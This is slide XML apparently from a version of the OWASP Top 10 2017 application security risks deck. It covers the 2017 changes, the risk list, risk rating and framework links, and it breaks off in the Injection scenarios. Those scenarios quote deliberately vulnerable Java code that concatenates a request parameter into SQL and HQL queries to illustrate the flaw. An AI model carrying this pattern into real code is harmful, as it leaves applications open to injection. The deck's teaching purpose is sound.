                        <a:rPr lang="ru-RU" sz="95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Attribution</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As there are more contributors than space here, we have created a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>dedicated page </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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p>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p>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ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Acknowledgements</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">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sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Over the last few years, the fundamental technology and architecture of applications has changed significantly:</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900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microservices written in node.js and Spring Boot are replacing traditional monolithic applications. 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p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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900" b="0" i="0" u="none" strike="noStrike" noProof="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p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>New issues, supported by data:</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hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A4:2017-XML External Entities (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>is a new category primarily supported by </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>source code analysis security testing tools</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (SAST)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> data sets. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>New issues, supported by the community:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which permits remote code execution or sensitive object manipulation on affected platforms.</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hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged or retired, but not forgotten:</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rPr>
                        <a:t>A4-Insecure Direct Object References </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7-Missing Function Level Access Control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>merged into </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017-Broken Access Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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rPr>
                        <a:t>A8-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> as many frameworks include </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CSRF defenses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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rPr>
                        <a:t>A10-Unvalidated Redirects and Forwards</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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rtl="0">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sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-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sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-</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A1 – Injection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A1:2017-Injection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A2 – Broken Authentication and Session Management</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A2:2017-Broken Authentication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A3 – Cross-Site Scripting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A3:2017-Sensitive Data Exposure</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A4 – Insecure Direct Object References </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A7]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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML External Entities (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans"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A5 – Security Misconfiguration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A5:2017-Broken Access Control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[Merged]</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A6 – Sensitive Data Exposure</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A6:2017-Security Misconfiguration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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7</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Missing</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Function</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solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Level</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Access</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Contr </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A4]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A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Scripting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A8 – Cross-Site Request Forgery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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">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A9 – Using Components with Known Vulnerabilities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A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Using Components with Known Vulnerabilities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A10 – Unvalidated Redirects and Forwards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A10:2017-Insufficient</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solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW,Comm.]</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RN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">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What</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> Are Application Security Risks?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Security</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4000"/>
              <a:t>Risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">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What’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" u="sng">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>My</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Risk?</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950">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="95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ru-RU" sz="950" b="0" u="none"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p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pP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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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Widespread: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1" i="0" u="none" strike="noStrike"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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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Severe: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="9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Moderate</a:t>
                      </a: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Uncommon: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Minor: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Article on Threat/Risk Modeling</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Risk Management Std</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ISMS</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NIST Cyber Framework (US)</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ASD Strategic Mitigations (AU)</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 Threat Modelling Tool</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a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Risks – 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="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A7:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1200" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1">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A10:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1200" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU"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ru-RU" sz="1200" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1">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ru-RU" sz="1200" b="1">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sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accounts WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  custID=</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request.getParameter("id")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b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Query HQLQuery = session.createQuery("FROM accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
